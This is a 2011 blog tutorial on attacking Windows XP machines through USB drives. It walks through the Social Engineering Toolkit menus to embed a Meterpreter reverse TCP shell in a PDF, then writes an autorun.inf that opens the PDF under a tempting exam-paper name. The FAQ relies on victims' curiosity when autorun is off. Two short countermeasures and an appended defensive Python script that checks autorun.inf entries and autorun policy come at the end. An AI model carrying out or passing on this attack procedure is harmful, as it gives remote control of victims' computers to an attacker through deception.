Friday, 19 August 2011

Hacking Windows With BackTrack SET & USB

Tools used: SET (Social Engineering Toolkit)
OS used: BackTrack 5
Victim OS: Windows XP SP3 (autorun function = on)
As we know, USB drives have lately become very, very popular with everyone ...
When I was living in a boarding house, I would sometimes hear my next-door neighbor say to the neighbor beside him, "Hey, let me copy that song from yesterday ... here's my USB drive; fine, just copy it, I'll let you know when it's done."
Is it actually possible to attack another computer using nothing but a USB drive? For the answer, see the steps below:
Preparation:
1. SET
2. OS (I use BackTrack 5, which already includes all of these tools)
Note: red text = command line


Steps:
1. Open the BackTrack console (CTRL + ALT + T), then go to the folder /pentest/exploits/set:
   cd /pentest/exploits/set
2. Start the Social Engineering Toolkit with the command ./set
3. Select number 3, "Infectious File Generator", then number 1, "File Format Exploit", and then enter the IP address of the attacker (your computer).
4. Select the exploit format to use ... here I use "Adobe PDF Embedded EXE social engineering".
5. The next step is to choose the PDF file that will be used in the attack. If you have your own PDF file, that is much better, because the victim will be less suspicious; here we choose number 1.
6. The next step is to select the payload, that is, what we want to happen to the victim when he opens the exploit we made. Here I choose number 2, "Windows Meterpreter Reverse_TCP shell".
7. Next is setting up the connect back: when the exploit runs successfully, on which port will we catch the connection? Here I use port 80 (why port 80? just look at the source).
8. At the question "Do you want to create a listener right now? [yes|no]" select YES.
9. All files generated by SET are stored in the folder /pentest/exploits/set/autorun, but the file name is somewhat suspicious and not very attractive, so it is better to rename the file first.
   Go to the autorun folder: cd /pentest/exploits/set/autorun
10. Run this command: pico autorun.inf
11. Inside the autorun.inf file, change the file name template.pdf to something that will tempt the victim to open the file. Here are the contents of the autorun.inf I made:
    [autorun]
    open = Soal_UAS_2011_Aljabar.pdf
    icon = autorun.ico
    Then press CTRL + O to save and CTRL + X to exit.



12. The next step is to rename template.pdf to the name we set in autorun.inf, using the mv command:
    mv template.pdf Soal_UAS_2011_Aljabar.pdf
13. That's it; all that remains is to copy all the files in the autorun folder onto your USB drive.
14. When the USB drive is plugged in and autorun is switched on on the victim's computer, it will automatically open the PDF file we created earlier.
15. When the victim clicks OK on each alert that pops up, then:
Success!
FAQ:
Q: What if it turns out that autorun is turned off on the victim's computer?
A: People are curious by nature; the victim will certainly do whatever it takes to open the PDF, especially after seeing that its title is important and interesting to him.
Countermeasures:
1. When an alert appears, or something that makes little sense happens, while opening a file with a certain extension, it is better to cancel and not continue.
2. Turn off autorun / autoplay
By v4l - Source: http://www.vishnuvalentino.com
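
A defender-side check for countermeasure 2, as an added example that is not part of the original post: it lists the entries in a drive's autorun.inf that launch a file, and decodes a NoDriveTypeAutoRun policy mask to show which drive types still have autorun enabled. The function names and the sample mask are assumptions made for illustration; the autorun.inf text is the one shown in step 11.

```python
# Added defensive example. SAMPLE_INF reproduces the autorun.inf from step 11;
# SAMPLE_MASK is a constructed value, not read from a real machine.

# Bits of the NoDriveTypeAutoRun policy value
# (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer).
# A set bit disables autorun for that drive type; 0xFF disables it everywhere.
DRIVE_BITS = {"unknown": 0x01, "removable": 0x04, "fixed": 0x08,
              "network": 0x10, "cdrom": 0x20, "ramdisk": 0x40}

SAMPLE_INF = """[autorun]
open = Soal_UAS_2011_Aljabar.pdf
icon = autorun.ico
"""
SAMPLE_MASK = 0x91


def launch_entries(inf_text):
    """Return (key, target) pairs in [autorun] that start a file."""
    found, in_autorun = [], False
    for raw in inf_text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # blank line or comment
            continue
        if line.startswith("["):                  # section names are case-insensitive
            in_autorun = line.lower() == "[autorun]"
            continue
        if in_autorun and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            key = key.lower()
            is_verb = key.startswith("shell\\") and key.endswith("\\command")
            if key in ("open", "shellexecute") or is_verb:
                found.append((key, value))
    return found


def autorun_enabled_types(mask):
    """Drive types whose bit is clear, i.e. autorun is still enabled for them."""
    return [name for name, bit in DRIVE_BITS.items() if not mask & bit]


if __name__ == "__main__":
    for key, target in launch_entries(SAMPLE_INF):
        print(f"autorun.inf launches a file: {key} -> {target}")
    enabled = autorun_enabled_types(SAMPLE_MASK)
    print("autorun still enabled for:", ", ".join(enabled) or "no drive type")
```

A mask that leaves "removable" in the second list means countermeasure 2 is not yet in effect for USB drives on that machine.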


Hopefully this is useful, and happy learning.